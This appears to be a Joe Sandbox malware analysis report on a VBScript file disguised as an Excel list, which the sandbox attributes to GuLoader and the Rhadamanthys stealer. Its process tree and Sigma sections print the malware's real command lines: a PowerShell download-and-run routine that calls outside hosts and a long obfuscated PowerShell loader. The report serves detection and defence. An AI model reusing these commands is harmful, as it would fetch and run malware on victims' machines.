Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
List of Required items xlsx.vbs

Overview

General Information

Sample name:List of Required items xlsx.vbs
Analysis ID:1568995
MD5:cf1cdbf6bc49cfd90ecd385d6d92cab7
SHA1:a956d185c710efca3ec5279041f029457d94a81f
SHA256:bf104a2d319361c09d65f78c462746e5453445517d147a67b4cb6e1767d92de7
Tags:Listofrequireditemsvbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Excel Network Connections
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4328 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7088 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 7220 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EXCEL.EXE (PID: 8172 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\ilurgw960k7fwnm.xlsx" MD5: 4A871771235598812032C822E6F68F19)
        • splwow64.exe (PID: 352 cmdline: C:\Windows\splwow64.exe 8192 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • powershell.exe (PID: 7832 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 3992 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 4492 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 7460 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr65F9.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/20442955" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 1320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2240,i,1470549389537924356,18333777287328738215,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 5280 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6EA4.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/a1d56f56" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 2664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,15536600320984337439,5913391626331834,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
          • wmpnscfg.exe (PID: 6628 cmdline: "C:\Program Files\Windows Media Player\wmpnscfg.exe" MD5: F912FF78DE347834EA56CEB0E12F80EC)
            • dllhost.exe (PID: 8004 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • svchost.exe (PID: 5944 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
SourceRuleDescriptionAuthorStrings
00000018.00000003.2899852769.0000000003780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000010.00000002.2719542932.0000000008CC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000018.00000003.2903015148.0000000005950000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000017.00000003.2910076907.0000000023BA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000017.00000003.2899229547.00000000243C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 11 entries
            SourceRuleDescriptionAuthorStrings
            24.3.svchost.exe.5950000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              23.3.msiexec.exe.243c0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                23.3.msiexec.exe.241a0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  24.3.svchost.exe.5730000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    23.3.msiexec.exe.243c0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 1 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi64_7352.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_7832.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xa117:$b2: ::FromBase64String(
                        • 0x91b2:$s1: -join
                        • 0x295e:$s4: +=
                        • 0x2a20:$s4: +=
                        • 0x6c47:$s4: +=
                        • 0x8d64:$s4: +=
                        • 0x904e:$s4: +=
                        • 0x9194:$s4: +=
                        • 0x1309e:$s4: +=
                        • 0x1311e:$s4: +=
                        • 0x131e4:$s4: +=
                        • 0x13264:$s4: +=
                        • 0x1343a:$s4: +=
                        • 0x134be:$s4: +=
                        • 0x99bb:$e4: Get-WmiObject
                        • 0x9baa:$e4: Get-Process
                        • 0x9c02:$e4: Start-Process
                        • 0x13d2b:$e4: Get-Process

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 416, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , ProcessId: 7088, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 416, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" , ProcessId: 7088, ProcessName: wscript.exe
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ProcessId: 416, ProcessName: powershell.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ProcessId: 4328, ProcessName: wscript.exe
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 416, TargetFilename: C:\Users\Public\grm2bfvsa42.vbs
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 8004, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 50041
                        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 52.113.195.132, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8172, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49814
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7660, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49887
